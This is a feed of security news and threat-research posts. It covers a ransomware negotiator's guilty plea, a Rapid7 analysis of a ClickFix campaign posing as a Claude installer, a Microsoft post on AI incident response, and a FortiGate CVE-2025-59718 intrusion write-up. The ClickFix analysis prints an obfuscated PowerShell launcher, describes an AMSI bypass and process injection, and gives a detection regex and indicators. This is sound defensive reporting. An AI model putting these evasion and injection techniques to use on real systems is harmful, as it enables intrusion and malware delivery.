Is The SOC Obsolete, And We Just Haven’t Admitted It Yet?

12 May 2026 at 07:00

Many AI-first enterprises have already embraced sovereign architectures for general AI initiatives; cybersecurity—and the SOC—should be next.

The post Is The SOC Obsolete, And We Just Haven’t Admitted It Yet? appeared first on SecurityWeek.

Former DigitalMint ransomware negotiator pleads guilty to extortion scheme

21 April 2026 at 17:03

A South Florida man pleaded guilty to conspiring with multiple ransomware affiliates to commit attacks against and extort payments from the same U.S. companies he represented as a ransomware negotiator for DigitalMint in 2023, the Justice Department said Monday.

Angelo John Martino III shared confidential information about victim organizations’ internal negotiating positions and insurance policy limits he gained from his work as a ransomware negotiator to extract the maximum ransom payment for himself and other BlackCat affiliates, according to his plea agreement.

Five of Martino’s victims hired DigitalMint, which assigned the 41-year-old to conduct ransomware negotiations on their behalf — a rare position he exploited to play both sides. DigitalMint, which is not accused of any knowledge of or involvement in the crimes, fired Martino the day after the Justice Department informed the company it was investigating him in April 2025.

The five U.S.-based victims that hired DigitalMint, unwittingly tapping Martino to conduct ransomware negotiations with himself and his co-conspirators, include a nonprofit and companies in the hospitality, financial services, retail and medical industries. All five of those victims paid a ransom.

Prosecutors previously said Martino helped accomplices extort a combined $75.3 million in ransom payments, including a nearly $26.8 million payment from the unnamed nonprofit, and a nearly $25.7 million payment from the unnamed financial services company. 

Martino also admitted to conspiring with Kevin Tyler Martin, another former ransomware negotiator at DigitalMint, and Ryan Clifford Goldberg, a former manager of incident response at Sygnia, to deploy BlackCat ransomware, also known as ALPHV, against five additional U.S. companies between April and November 2023. 

Goldberg and Martin pleaded guilty in December to participating in a series of ransomware attacks and are scheduled for sentencing April 30.

“Angelo Martino’s clients trusted him to respond to ransomware threats and help thwart and remedy them on behalf of victims,” A. Tysen Duva, assistant attorney general at the Justice Department’s Criminal Division, said in a statement. “Instead, he betrayed them and began launching ransomware attacks himself by assisting cybercriminals and harming victims, his own employer, and the cyber incident response industry itself.”

The case against Martino showcases an extreme, albeit rare, example of the dark underbelly of ransomware negotiation as a practice. The pitfalls of these backchannel negotiations, which remain largely unscrutinized, are numerous, and they can go awry for any number of reasons.

Officials shared a series of chats Martino held with co-conspirators and his victims that exemplify the lengths to which he went to betray DigitalMint’s clients and empower his accomplices with crucial tips for a successful negotiation strategy.

DigitalMint did not respond to a request for comment on Martino’s guilty plea.

Negotiation chats exemplify Martino’s crimes

During an incident response with one of his victims, Martino told a BlackCat affiliate the company’s insurance carrier “was only approving small accounts,” according to his plea agreement. “Keep denying our offers and I will let you know once I find out the max the[y] want to pay,” he added.

“We don’t know how you came up with your demand but we are losing money operationally and all of our loans are going to turnover on us this year at double the interest rates,” Martino said in a negotiation chat visible to DigitalMint and the victim organization in the hospitality industry. “We are able to give you $1 million now, which is a very serious offer.”

Following Martino’s instructions, the BlackCat accomplice responded: “Well, you can keep that for the penalties and lawsuits which are coming your way in case we expose you. Time is ticking — we know how much you can pay. Contact your insurance. We know about them also. Stop wasting time.”

That victim company ultimately paid a ransom worth nearly $16.5 million at the time to receive a decryptor and the BlackCat affiliate’s commitment to not publish stolen data. The two other victims Martino represented via DigitalMint at the time paid $6.1 million and $213,000 ransoms for similar commitments.

“Ransomware victims turned to this defendant for help, and he sold them out from the inside,” Jason A. Reding Quiñones, U.S. attorney for the Southern District of Florida, said in a statement.

Martino received a portion of the ransomware payments for his involvement in the conspiracy.

Authorities have seized $10 million in assets and cryptocurrency wallets controlled by Martino. Law enforcement seized multiple vehicles, a food truck and a 29-foot luxury fishing boat that he obtained using proceeds from his crimes.

Officials also seized two properties owned by Martino in Nokomis, Florida, including a bayfront home with an estimated value of $1.68 million and a second single-family home with an estimated value of $396,000. 

Martino surrendered in March to the U.S. Marshals in Miami and was released on a $500,000 bond.

“The FBI works every day to dismantle the ransomware ecosystem,” Brett Leatherman, assistant director of the FBI’s Cyber Division, said in a statement. “That includes apprehending key facilitators like Angelo Martino, who abused the trust placed in him as a private sector negotiator by collaborating with ransomware criminals.”

ALPHV/BlackCat was a notorious ransomware and extortion group linked to a series of attacks on critical infrastructure providers. The ransomware variant first appeared in late 2021, and was later used in dozens of attacks on organizations in the health care sector.

The group behind the ransomware strain also claimed responsibility for the February 2024 attack on UnitedHealth Group subsidiary Change Healthcare, which paid a $22 million ransom. That incident became the largest health care data breach on record, compromising data on about 190 million people.

Martino pleaded guilty to conspiracy to obstruct, delay or affect commerce or the movement of any article or commodity in commerce by extortion. He faces up to 20 years in federal prison and is scheduled for sentencing July 9.

You can read Martino’s plea agreement below.

The post Former DigitalMint ransomware negotiator pleads guilty to extortion scheme appeared first on CyberScoop.

ClickFix Phishing Campaign Masquerading as a Claude Installer

16 April 2026 at 09:00

Overview

It is no secret that phishing campaigns utilizing various ClickFix techniques have been a commonly used method of social engineering. One of the main reasons for this is simply because they work. You know this and Rapid7 does as well. As a company offering managed detection and response (MDR), our customers expect us to be knowledgeable about and able to detect attacks as common as ClickFix campaigns. 

Recently, Rapid7 observed a small grouping of ClickFix events across customers in the EU and US. At the time of discovery, this campaign had very little traction on sites like VirusTotal or within the online security landscape. This campaign was particularly interesting as it appeared to be masquerading as an installer for Claude, an AI tool that has received a considerable amount of attention. 

Using Rapid7 InsightIDR detection rules, our SOC analysts were able to detect and respond to the threat, preventing further compromise. This campaign demonstrates the strength Rapid7 customers get from our MDR service, while peeling back the curtain to provide a real-world example of how we operate behind the scenes. In this blog, we will detail a brief technical analysis of the observed threat actor activities and discuss how this serves as an example of the service we aim to provide our MDR customers. The analysis highlights both the multi-step delivery of the payload and the work Rapid7 performs when investigating threats.

Observed attacker behavior

On April 9, Rapid7 was alerted to mshta being executed on a customer asset via the Windows run utility. The alert was generated by the detection rule Attacker Technique - Remote Payload Execution via Run Utility (shell32.dll). This rule generates an alert when a suspicious process, such as mshta, is added to the RunMRU registry key. This key is important for the detection of ClickFix campaigns, as it tracks the last 26 commands executed by the Windows run utility. One thing that stuck out about this particular mshta command was the URL, download-version[.]1-5-8[.]com/claude.msixbundle, which appeared to be impersonating an MSIX bundle for the popular AI tool, Claude.

MSIX files are Windows app packages that one would typically see from the Microsoft Store; they are definitely not something you would expect to see passed as an argument to mshta. While the host was quickly taken down before Rapid7 was able to obtain the claude.msixbundle payload, a copy was obtained from VirusTotal. Looking at the payload, it does initially appear to be an MSIX bundle. The file header signature, PK, indicates that the file is a ZIP archive, and it contains a string reference to the MSIX bundle MicrosoftBing_1.1.37.0_ARM64.msix:

ClaudeFix_figure1.png
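This triage step can be sketched in a few lines of Python: check the ZIP magic bytes, then list archive members for an embedded HTA. The member names below are illustrative, not the actual bundle contents.

```python
import io
import zipfile

def triage_msixbundle(data: bytes):
    """Check whether a purported .msixbundle is really a ZIP archive and
    flag any embedded HTML Application (.hta) members."""
    if data[:2] != b"PK":  # ZIP local-file-header magic
        return False, []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        suspicious = [n for n in zf.namelist() if n.lower().endswith(".hta")]
    return True, suspicious

# Build a toy "bundle" in memory to exercise the check (names are hypothetical).
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("MicrosoftBing_1.1.37.0_ARM64.msix", b"decoy")
    zf.writestr("payload.hta", b"<script language='VBScript'></script>")
is_zip, htas = triage_msixbundle(buf.getvalue())
```

On the real sample, the same logic would surface the embedded HTA despite the MSIX-looking wrapper.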

Exploring the payload deeper, however, reveals an HTML Application (HTA) embedded within the ZIP archive:

ClaudeFix_figure2.png

The Visual Basic script within the HTA file contains a series of obfuscated strings that are deobfuscated with the following VBS function:

ClaudeFix_figure3.png

Additionally, one of the functions serves to generate an encoded PowerShell script that will serve as the next step in the chain:

ClaudeFix_figure4.png

After the deobfuscation routine is complete, these strings contain references to the required objects and function calls to craft and execute – via ShellExec – the following command:

“c:\Windows\System32\cmd.exe” /v:on /c “set x=pow&&set y=ershell&&call %windir%\SysWOW64\WindowsPowershell\v1.0\!x!!y! -E [ENCODED COMMAND]”

ClaudeFix_figure5.png
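The set x=pow&&set y=ershell fragment hides the string powershell behind cmd.exe delayed variable expansion. A minimal Python sketch, not Rapid7 tooling, of how a detection pipeline might resolve such fragments before pattern matching:

```python
import re

def resolve_delayed_expansion(cmd: str) -> str:
    """Resolve cmd.exe delayed-expansion variables (!x!) assigned via
    'set name=value' fragments, recovering the hidden binary name."""
    env = dict(re.findall(r'set (\w+)=([^&"]+)', cmd))
    return re.sub(r"!(\w+)!", lambda m: env.get(m.group(1).lower(), m.group(0)), cmd)

cmd = ('"c:\\Windows\\System32\\cmd.exe" /v:on /c "set x=pow&&set y=ershell'
       '&&call %windir%\\SysWOW64\\WindowsPowershell\\v1.0\\!x!!y! -E ..."')
resolved = resolve_delayed_expansion(cmd)
```

After resolution, the command plainly invokes powershell, which ordinary keyword rules can catch.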

The encoded PowerShell acts as a staging payload. The script will first generate an MD5 hash value based on the COMPUTERNAME and USERNAME environment variables. It will then take the first 16 characters of the hash value and use it to craft a URL to pull another, much larger, PowerShell script. The script also contains a string deobfuscation routine that is responsible for crafting the following strings to be passed to various .NET functions:

  • Assembly

  • System.Management.Automation.AmsiUtils

  • amsiContext

  • NonPublic,Static

  • 0x41414141

ClaudeFix_figure6.png
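The per-victim URL derivation described above can be sketched in Python. This is a hedged illustration: the exact concatenation order, separator, and URL layout are assumptions, and the hostname is a placeholder.

```python
import hashlib

def victim_stage_url(computername: str, username: str, base: str) -> str:
    """Sketch of the stager's per-victim URL: an MD5 over host identity
    values, truncated to the first 16 hex characters. Concatenation
    order and URL layout are assumptions for illustration."""
    victim_id = hashlib.md5((computername + username).encode()).hexdigest()[:16]
    return f"{base}/{victim_id}"

# Hypothetical host identity and defanged placeholder domain.
url = victim_stage_url("DESKTOP-01", "alice", "https://example[.]invalid")
```

Deriving the path from COMPUTERNAME and USERNAME lets the server hand out one payload per victim and ignore requests from sandboxes that do not present a known identifier.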

The script will then call the deobfuscation routine to craft a call to WriteInt32 in the .NET Marshal library to overwrite the amsiContext field in System.Management.Automation.AmsiUtils with the value 0x41414141. Once amsiContext is overwritten, the script will download and execute the next stage:

ClaudeFix_figure7.png

The URL is hosting yet another PowerShell script containing highly obfuscated strings and a large byte array. Upon execution of the script, the strings decode to contain the necessary .NET types and method calls to create and execute a PowerShell ScriptBlock. This ScriptBlock is derived from the byte array, which is first base64 decoded and then run through a deobfuscation routine:

ClaudeFix_figure8.png

This ScriptBlock again contains another series of obfuscated strings and a large byte array containing yet another PowerShell ScriptBlock. Following the execution of the script, the code once again creates and executes a PowerShell ScriptBlock:

ClaudeFix_figure9.png

This ScriptBlock culminates in a process injection routine using the .NET interoperability library. The code contains a byte array with encrypted shellcode that gets passed through a XOR routine. The script then obtains handles to the following Windows API calls:

  • NtAllocateVirtualMemory

  • Copy

  • NtProtectVirtualMemory

  • NtCreateThreadEx

  • NtWaitForSingleObject

  • NtFreeVirtualMemory

  • NtClose

After obtaining the handles, the script crafts delegate functions for the Windows API calls and invokes the delegates to perform the process injection routine:

ClaudeFix_figure10.png
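The XOR unwrapping step before injection is straightforward to illustrate; the key and bytes below are placeholders, not values from the actual sample.

```python
def xor_decode(buf: bytes, key: bytes) -> bytes:
    """Repeating-key XOR routine of the kind used to unwrap the
    embedded shellcode before process injection."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(buf))

key = b"\x41"                  # hypothetical single-byte key
plain = b"\xfc\x48\x83\xe4"    # placeholder shellcode prologue bytes
encoded = xor_decode(plain, key)
assert xor_decode(encoded, key) == plain  # XOR is its own inverse
```

Because XOR is symmetric, the same routine both encrypts the shellcode at build time and decodes it at runtime, which is why defenders often brute-force short keys against suspicious byte arrays.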

Importance to Rapid7’s MDR customers

Rapid7 MDR customers receive the security knowledge of our threat intelligence, detection engineering, incident response, and security operations center analysts. Input from all of these sources directly feeds into how we create detections and respond to alerts. Following is an explanation of how we use events like these to further provide and enhance our services for customers. 

As previously mentioned, ClickFix activity is not new. Detection engineers in the MDR service know this and build rules to address these techniques, such as the rule that caught the activity discussed in this blog. Detection rules are created in response to activity observed in incident response, customer requests, activity observed from the SOC, threat intelligence, and observations of the security landscape. Rapid7’s detection engineers work with the SOC to monitor these rules for efficacy. Rules that are primarily used to detect initial compromise, such as the one that alerted on this campaign, are additionally monitored to identify any new campaigns.

Once the campaign is identified, our detection engineers research it to create additional rules. They can also perform retroactive threat hunts across the Rapid7 customer base using IOCs or any new behavioral detections created from researching the campaign. Results from researching campaigns like this one then go on to feed threat intelligence and help inform our detection strategy. This campaign provides a great example of how Rapid7 works on the backend to detect and prevent threats in customer environments. 

Mitigation guidance

Monitor the following registry key to watch for potential ClickFix attacks such as the one observed in this case:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
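Because RunMRU values are short command strings, even simple pattern matching over exported values can surface ClickFix-style entries. A hedged sketch; the patterns are illustrative, not Rapid7's detection logic:

```python
import re

# Flag LOLBin + remote URL pairings typical of ClickFix lures (illustrative).
SUSPICIOUS = re.compile(r"\b(mshta|powershell|bitsadmin|curl)\b.*https?:", re.I)

def flag_runmru(entries):
    """Return RunMRU values that pair a living-off-the-land binary with
    a remote URL. RunMRU values are keyed a-z and end with '\\1'."""
    return [e for e in entries if SUSPICIOUS.search(e)]

entries = [
    r"notepad\1",
    r"mshta https://download-version[.]1-5-8[.]com/claude.msixbundle\1",
]
hits = flag_runmru(entries)
```

In practice, this logic would run over RunMRU values collected by endpoint telemetry rather than a hard-coded list.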

While Rapid7 MDR customers were covered by the managed SOC, Rapid7 recommends the following actions for containment:

If the activity is not expected, apply containment and review the user's browsing history for the source of the command. The initial lure is often presented to the user when they attempt to browse the internet for free downloads (media, software, etc.). In some cases the malicious command may have been copied to the user's clipboard when visiting the initial webpage, and can be viewed by inspecting the source code of the site. If the infection is successful, an information stealer is often executed as the final payload, meaning that any credentials stored on the infected system should be reset as part of restoration.

MITRE ATT&CK techniques

System Binary Proxy Execution: Mshta

T1218.005

Obfuscated Files or Information: Encrypted/Encoded File

T1027.013

Obfuscated Files or Information: Command Obfuscation

T1027.010

Command and Scripting Interpreter: PowerShell

T1059.001

Process Injection

T1055

Indicators of compromise (IOCs)

claude.msixbundle:

  • 2b99ade9224add2ce86eb836dcf70040315f6dc95e772ea98f24a30cdf4fdb97

Domains observed by Rapid7:

  • oakenfjrod[.]ru

  • download-version[.]1-5-8[.]com

  • download[.]get-version[.]com

Incident response for AI: Same fire, different fuel

When a traditional security incident hits, responders replay what happened. They trace a known code path, find the defect, and patch it. The same input produces the same bad output, and a fix proves it will not happen again. That mental model has carried incident response for decades.

AI breaks it. A model may produce harmful output today, but the same prompt tomorrow may produce something different. The root cause is not a line of code; it is a probability distribution shaped by training data, context windows, and user inputs that no one predicted. Meanwhile, the system is generating content at machine speed. A gap in a safety classifier does not leak one record. It produces thousands of harmful outputs before a human reviewer sees the first one.

Fortunately, most of the fundamentals that make incident response (IR) effective still hold true. The instincts that seasoned responders have developed over time still apply: prioritizing containment, communicating transparently, and learning from each incident.

AI introduces new categories of harm, accelerates response timelines, and calls for skills and telemetry that many teams are still developing. This post explores which practices remain effective and which require fresh preparation.

The fundamentals still hold

The core insight of crisis management applies to AI without modification: the technical failure is the mechanism, but trust is the actual system under threat. When an AI system produces harmful output, leaks training data, or behaves in ways users did not expect, the damage extends beyond the technical artifact. Trust has technical, legal, ethical, and social dimensions. Your response must address all of them, which is why incident response for AI is inherently cross-functional.

Several established principles transfer directly.

Explicit ownership at every level. Someone must be in command. The incident commander synthesizes input from domain experts; they do not need to be the deepest technical expert in the room. What matters is that ownership is clear and decision-making authority is understood.

Containment before investigation. Stop ongoing harm first. Investigation runs in parallel, not after containment is complete. For AI systems, this might mean disabling a feature, applying a content filter, or throttling access while you determine scope.

Escalation should be psychologically safe. The cost of escalating unnecessarily is minor. The cost of delayed escalation can be severe. Build a culture where raising a flag early is expected, not penalized.

Communication tone matters as much as content. Stakeholders tolerate problems. They cannot tolerate uncertainty about whether anyone is in control. Demonstrate active problem-solving. Be explicit about what you know, what you suspect, and what you are doing about each.

These principles are tested, and they are effective in guiding action. The challenge with AI is not that these principles no longer apply; it is that AI introduces conditions where applying them requires new information, new tools, and new judgment.

Where AI changes the equation

Non-determinism and speed are the headline shifts, but they are not the only ones.

New harm types complicate classification and triage. Traditional IR taxonomies center on confidentiality, integrity, and availability. AI incidents can involve harms that do not fit those categories cleanly: generating dangerous instructions, producing content that targets specific groups, or enabling misuse through natural language interfaces. By making advanced capabilities easy to use, these interfaces enable untrained users to perform complex actions, increasing the risk of misuse or unintended harm. This is why we need an expanded taxonomy. If your incident classification system lacks categories for these harms, your triage process will default to “other” and lose signal.
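One way to avoid the “other” bucket is to make the expanded taxonomy explicit in triage tooling. A minimal sketch, with all category names and routing invented for illustration:

```python
from enum import Enum

class HarmCategory(Enum):
    """Extended triage taxonomy: classic CIA impacts plus AI-specific
    harm types, so AI incidents don't collapse into 'other'."""
    CONFIDENTIALITY = "confidentiality"
    INTEGRITY = "integrity"
    AVAILABILITY = "availability"
    DANGEROUS_INSTRUCTIONS = "dangerous-instructions"   # harmful how-to output
    TARGETED_CONTENT = "targeted-content"               # content targeting groups
    CAPABILITY_MISUSE = "capability-misuse"             # NL interface abuse
    OTHER = "other"

AI_HARMS = {HarmCategory.DANGEROUS_INSTRUCTIONS,
            HarmCategory.TARGETED_CONTENT,
            HarmCategory.CAPABILITY_MISUSE}

def triage(category: HarmCategory) -> str:
    # Route AI-specific harms to safety review instead of the generic queue.
    return "safety-review" if category in AI_HARMS else "security-queue"
```

The point is not these particular labels but that the classification scheme names the AI-specific harms explicitly, so triage preserves signal instead of discarding it.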

Severity resists simple quantification. A model producing inaccurate medical information is a different severity than the same model producing inaccurate trivia answers. Good severity frameworks guide judgment; they cannot replace it. For AI incidents, the context around who is affected and how they are affected carries more weight than traditional security metrics alone can capture.

Root cause is often multi-dimensional. In traditional incidents, you find the bug and fix it. In AI incidents, problematic behavior can emerge from the interaction of training data, fine-tuning choices, user context, and retrieval inputs. Investigation may narrow the contributing factors without isolating one defect. Your process must accommodate that ambiguity rather than stalling until certainty arrives.

Before the crisis is the time to work through these implications. The questions that matter: How and when will you know? Who is on point and what is expected of them? What is the response plan? Who needs to be informed, and when? Every one of these questions that you answer before the incident is time you buy during it.

Closing the gaps in telemetry, tooling, and response

If AI changes the nature of incidents, it also changes what you need in order to detect and respond to them.

Observability is the first gap. Traditional security telemetry monitors network traffic, authentication events, file system changes, and process execution. AI incidents generate different signals: anomalous output patterns, spikes in user reports, shifts in content classifier confidence scores, unexpected model behavior after an update. Many organizations have not yet instrumented AI systems for these signals and, without clear signal, defenders may first learn about incidents from social media or customer complaints. Neither provides the early warning that effective response requires.
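As one illustration, a shift in content classifier confidence scores can be watched with a rolling comparison against a trailing baseline. The window sizes and threshold below are illustrative, not recommendations:

```python
from collections import deque

class ConfidenceDriftMonitor:
    """Flag a sustained drop in a safety classifier's mean confidence
    versus a trailing baseline -- one of the AI-specific signals worth
    instrumenting."""
    def __init__(self, window: int = 100, threshold: float = 0.15):
        self.baseline = deque(maxlen=window)        # long-term scores
        self.recent = deque(maxlen=window // 10)    # short-term scores
        self.threshold = threshold

    def observe(self, score: float) -> bool:
        self.recent.append(score)
        alert = False
        if (len(self.baseline) == self.baseline.maxlen
                and len(self.recent) == self.recent.maxlen):
            base = sum(self.baseline) / len(self.baseline)
            now = sum(self.recent) / len(self.recent)
            alert = (base - now) > self.threshold
        self.baseline.append(score)
        return alert

mon = ConfidenceDriftMonitor()
for _ in range(100):
    mon.observe(0.95)                                 # healthy baseline
alerts = [mon.observe(0.60) for _ in range(10)]       # sudden drop
```

A production version would also watch report volumes and output anomaly rates, but even this simple drift check provides earlier warning than waiting for user complaints.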

AI systems are built with strong privacy defaults – minimal logging, restricted retention, anonymized inputs – and those same defaults narrow the forensic record when you need to establish what a user saw, what data the model touched, or how an attacker manipulated the system. Privacy-by-design and investigative capability require deliberate reconciliation before an incident, because that decision does not get easier once the clock is running.

AI can also help close these gaps. We use AI in our own response operations to enhance our ability to:

  • Detect anomalous outputs as they occur
  • Enforce content policies at system speed
  • Examine model outputs at volumes no human team can match
  • Distill incident discussions so responders spend time deciding rather than reading
  • Coordinate across response workstreams faster than email chains allow

Staged remediation reflects the reality of AI fixes. Incidents require both swift action and thorough review. A model behavior change or guardrail update may not be immediately verifiable in the way a traditional patch is. We use a three-stage approach:

  • Stop the bleed. Tactical mitigations: block known-bad inputs, apply filters, restrict access. The goal is reducing active harm within the first hour.
  • Fan out and strengthen. Broader pattern analysis and expanded mitigations over the next 24 hours, covering thousands of related items. Automation is essential here; manual review cannot keep pace.
  • Fix at the source. Classifier updates, model adjustments, and systemic changes based on what investigation revealed. This stage takes longer, and that is acceptable. The first two stages bought time.

One practical tip: tactical allow-and-block lists are a necessary triage tool, but they are a losing proposition as a permanent solution. Adversaries adapt. Classifiers and systemic fixes are the durable answer.

Watch periods after remediation matter more for AI than for traditional patches. Because model behavior is non-deterministic, verification relies on sustained testing and monitoring across varied conditions rather than a single test pass; monitoring after each remediation stage confirms that the fix continues to hold.

The human dimension

There is a dimension of AI incident response that traditional IR addresses unevenly and that AI makes urgent: the wellbeing of the people doing the work.

Defenders handling AI abuse reports and safety incidents are routinely exposed to harmful content. This is not the same cognitive load as analyzing malware samples or reviewing firewall logs. Exposure to graphic, violent, or exploitative material has measurable psychological effects, and extended incidents compound that exposure over days or weeks.

Human exhaustion threatens correctness, continuity, and judgment in any prolonged incident. AI safety incidents place an additional emotional burden on responders due to exposure to distressing content. Recognizing and addressing this challenge is essential, as it directly impacts the well-being of the team and the quality of the response.

What helps:

  • Talk to your team about well-being before the crisis, not during it.
  • Manager-sponsored interventions during extended response work, including scheduled breaks, structured handoffs, and deliberate activities that provide cognitive relief.
  • Some teams use structured cognitive breaks, including visual-spatial activities, to reduce the impact of prolonged exposure to harmful content.
  • Coaching and peer mentoring programs normalize the impact rather than framing it as individual weakness.
  • Leverage proven practices from safety content moderation teams; their operational workflows for content review and escalation map directly to AI security moderation, making this a natural collaboration opportunity.

If your incident response plan does not account for the humans executing it, the plan is incomplete.

Looking ahead

Incident response for AI is not a solved problem. The threat surface is evolving as models gain new capabilities, as agentic architectures introduce autonomous action, and as adversaries learn to exploit natural language at scale. The teams that will handle this well are the ones building adaptive capacity now. Extend playbooks. Instrument AI systems for the right signals. Rehearse novel scenarios. Invest in the people who will be on the front line when something breaks. Good response processes limit damage. Great ones make you stronger for the next incident.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post Incident response for AI: Same fire, different fuel appeared first on Microsoft Security Blog.

FortiGate CVE-2025-59718 Exploitation: Incident Response Findings

8 April 2026 at 09:39

Rapid7’s Incident Response (IR) team was engaged to investigate an incident involving exploitation of CVE-2025-59718 against a vulnerable FortiGate appliance. In December 2025, Fortinet disclosed this improper verification of cryptographic signature vulnerability, which facilitates an SSO login bypass on affected appliances. After initial exploitation, the attackers maintained a low-profile posture, systematically compromising additional firewalls before moving to internal network hosts. Ultimately, this slow, deliberate pace gave responders time to contain the threat before further impact could occur within the environment. This blog details exploitation insights, attack progression, and practical detection opportunities for defenders monitoring their own environments.

Investigative methodology: Tracing the initial access vector in FortiGate appliances

Identifying the Initial Access Vector (IAV) is a cornerstone of any incident response engagement. However, when the source of compromise is not immediately obvious, particularly when edge device exploitation is involved, responders often need to take a broader investigative approach. Rather than starting with a clear point of entry, investigators must analyze the available telemetry, reconstruct attacker activity, and work backwards to determine how access was first obtained.

This process often involves multiple investigative workstreams running in parallel, each designed to answer different questions about the intrusion. As many IR responders and enthusiasts know, the first suspicious event observed during an investigation is rarely the first action taken by the attacker. Instead, it typically represents a point somewhere in the middle of a larger attack chain.

A key step in incident response investigations is reconstructing the attacker timeline. Responders often take an “inside out” approach, moving outward from the initial alert to the full scope of the malicious activity and, ultimately, the IAV, correlating multiple data sources to map how the event unfolded. This process involves examining authentication logs, endpoint telemetry, firewall events, and records of system changes rather than depending on a single log source. It also typically requires frequent pivoting between artifacts, as investigations rarely unfold in a linear fashion. By aligning these findings chronologically, investigators often identify activity that predates the initial alert.
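The chronological alignment of multiple log sources can be sketched as a simple merge; the sources, timestamps, and messages below are illustrative:

```python
from datetime import datetime, timezone

def merge_timeline(*sources):
    """Merge events from multiple log sources (auth, endpoint, firewall)
    into a single chronological attacker timeline."""
    events = [e for src in sources for e in src]
    return sorted(events, key=lambda e: e["ts"])

# Hypothetical per-source event lists with UTC timestamps.
auth     = [{"ts": datetime(2025, 12, 3, 9, 5, tzinfo=timezone.utc),
             "src": "auth", "msg": "interactive logon"}]
endpoint = [{"ts": datetime(2025, 12, 3, 8, 47, tzinfo=timezone.utc),
             "src": "edr", "msg": "credential-dumping tool executed"}]
firewall = [{"ts": datetime(2025, 12, 3, 8, 12, tzinfo=timezone.utc),
             "src": "fw", "msg": "vpn.ssl.settings edited"}]
timeline = merge_timeline(auth, endpoint, firewall)
```

Once merged, the earliest entries frequently point at activity that predates the alert that opened the investigation, which is exactly the "inside out" pivot described above.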

CVE-2025-59718: Technical analysis and observed attacker behavior

The first activity that drew attention was enumeration and credential discovery within the internal environment. This basic enumeration included gathering information about users, systems, and accessible resources within common user directories. This activity eventually expanded to SMB-based file scraping and network share access, allowing attackers to review files stored across the environment. While this behavior resembled routine administration, the chronological sequence of file scraping and network share access painted a clear picture of an attacker’s initial discovery phase.

Digging deeper into the credential discovery activity, investigators found that the popular tool Mimikatz was utilized to harvest credentials from various sources within the impacted environment. The attacker’s objective was to obtain valid credentials for an elevated admin account with the goal of blending in.

With credentials in hand and mimicking admin activity to disguise their actions, the attacker was then able to move laterally throughout the environment using common administrative tools and access methods. PsExec and Microsoft Remote Desktop (RDP) were two tools utilized for lateral movement, while standard web browsers facilitated application access.

Attackers appeared particularly interested in systems that could provide broader access to the environment, including virtualization platforms, domain controllers, and servers supporting backup infrastructure. These systems often represent high-value targets for attackers seeking to escalate privileges, access sensitive data, or disrupt recovery capabilities.

Responders were working simultaneously to contain the attacker while building the narrative to cut them off at the source. As more information came to light, the IAV puzzle began to unravel. Strangely, the first authentication into the Windows environment originated from an internal IP address that did not align with the known internal IP ranges. That address fell within the DHCP lease range of the FortiGate device. At first glance, this could be written off as legitimate VPN activity; however, raising further questions, the FortiGate SSL VPN had never been enabled in this environment. This revelation made the FortiGate device the prime suspect for the IAV.
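That source-IP sanity check is easy to automate; a sketch using the standard library, with all ranges hypothetical:

```python
import ipaddress

# Hypothetical ranges: the environment's documented internal subnets and
# the lease pool served by the firewall's own DHCP scope.
KNOWN_INTERNAL = [ipaddress.ip_network(n) for n in ("10.10.0.0/16", "10.20.0.0/16")]
FORTIGATE_DHCP = ipaddress.ip_network("192.168.100.0/24")

def classify_source(ip: str) -> str:
    """Classify an authentication source IP: known internal range,
    firewall DHCP lease pool (possible edge-device pivot), or other."""
    addr = ipaddress.ip_address(ip)
    if any(addr in net for net in KNOWN_INTERNAL):
        return "known-internal"
    if addr in FORTIGATE_DHCP:
        return "fortigate-dhcp"   # worth pulling the device's own logs
    return "unrecognized"

verdict = classify_source("192.168.100.23")
```

Running every first-seen authentication source through a check like this surfaces exactly the anomaly the responders spotted manually: an "internal" address that belongs to the edge device rather than the corporate network.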

Taking a closer look at the FortiGate device, specifically system logs and configuration data, revealed early indications that the device had been modified to support continued access. The SSL VPN component had been enabled, and multiple configuration changes were identified, including edits to VPN settings, the creation of new firewall policies, and adjustments to configuration parameters. These changes appeared in FortiGate system logs as configuration updates similar to the following:

logid="0100044546" type="event" subtype="system" level="information"
vd="root" logdesc="Attribute configured" user="admins"
ui="GUI(45.32.216[.]250)" action="Edit" cfgpath="vpn.ssl.settings"
msg="Edit vpn.ssl.settings"

logid="0100044547" type="event" subtype="system" level="information" 
vd="root" logdesc="Object attribute configured" user="admins" 
ui="GUI(45.32.216[.]250)" action="Add" cfgpath="firewall.policy" 
cfgobj="XX" msg="Add firewall.policy <redacted>"

While these types of changes may seem routine in isolation, it is the combination and timing of these actions that raises concerns from a responder's perspective. The investigation's next key clue was identified when the source of these changes was traced back to a newly created account.
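A minimal parser for key="value" FortiGate event lines like the ones above might look like the following sketch; the watched cfgpath values are assumptions drawn from the changes described in this investigation.

```python
import shlex

def parse_fortigate_log(line: str) -> dict:
    """Parse a FortiGate key="value" event line into a dict."""
    return dict(tok.split("=", 1) for tok in shlex.split(line) if "=" in tok)

# cfgpath values worth watching; assumed from the changes described above.
WATCHED_CFGPATHS = {"vpn.ssl.settings", "firewall.policy"}

sample = ('logid="0100044546" type="event" subtype="system" level="information" '
          'vd="root" logdesc="Attribute configured" user="admins" '
          'ui="GUI(45.32.216[.]250)" action="Edit" cfgpath="vpn.ssl.settings" '
          'msg="Edit vpn.ssl.settings"')

event = parse_fortigate_log(sample)
if event.get("cfgpath") in WATCHED_CFGPATHS:
    print(f'config change to {event["cfgpath"]} by {event["user"]} from {event["ui"]}')
```

shlex handles the quoted values (including spaces, as in logdesc) without a hand-rolled regex, which keeps the parser honest against multi-word fields.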

Following this thread further, investigators identified that multiple accounts had been created on the device, including SSO administrator, system administrator, and local accounts. Several of these accounts were associated with email domains attributed to Namecheap-hosted infrastructure, including domains such as openmail[.]pro. Notably, some of the newly created SSO administrator accounts were linked to forticloud.com domains as reflected in log entries such as:

Object attribute configured(Add system.sso-forticloud-admin <attacker account>@forticloud.com-1)

